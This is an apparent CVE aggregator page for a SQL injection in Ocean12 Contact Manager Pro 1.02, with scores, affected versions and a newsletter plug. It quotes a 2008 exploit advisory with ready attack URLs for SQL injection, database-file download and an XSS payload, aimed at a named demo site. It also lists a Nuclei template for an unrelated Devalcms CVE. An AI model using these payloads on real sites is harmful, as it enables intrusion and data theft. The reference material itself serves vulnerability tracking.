CVE-2008-6369
published 2009-03-02CVE-2008-6369: SQL injection vulnerability in default.asp in Ocean12 Contact Manager Pro 1.02 allows remote attackers to execute arbitrary SQL commands via the Sort parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.5th percentile
SQL injection vulnerability in default.asp in Ocean12 Contact Manager Pro 1.02 allows remote attackers to execute arbitrary SQL commands via the Sort parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ocean12tech | contact_manager_pro | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
exploitdb·2008-11-27
CVE-2008-6370 Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
---
#########################################################
Portal Name: Ocean12 Contact Manager Pro
Version : 1.02
Vendor : http://ocean12tech.com/products/contact
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
Author : Pouya_Server , [email protected]
Vulnerability : (DDV,XSS,SQL)
#########################################################
[SQL]:
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
[Database Disclosure Vulnerability]:
http://site.com/path/o12con.mdb
[XSS]:
http://site.com/path/?DisplayFormat=>">alert(1369)%3B&Action=Pouya_Server
Victem :
http://ocean12tech.com/products/contact/demo
# milw0rm.com [2008-11-27]
Nuclei
Devalcms 1.4a - Cross-Site Scripting
nuclei·CVSS 4.3
CVE-2008-6982 [MEDIUM] Devalcms 1.4a - Cross-Site Scripting
Devalcms 1.4a - Cross-Site Scripting
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
Template:
id: CVE-2008-6982
info:
name: Devalcms 1.4a - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/6369
- http://sourceforge.net/projects/devalc
No writeups or analysis indexed.
http://osvdb.org/50316http://secunia.com/advisories/32903http://www.securityfocus.com/bid/32502https://exchange.xforce.ibmcloud.com/vulnerabilities/46961https://www.exploit-db.com/exploits/7244http://osvdb.org/50316http://secunia.com/advisories/32903http://www.securityfocus.com/bid/32502https://exchange.xforce.ibmcloud.com/vulnerabilities/46961https://www.exploit-db.com/exploits/7244
2009-03-02
Published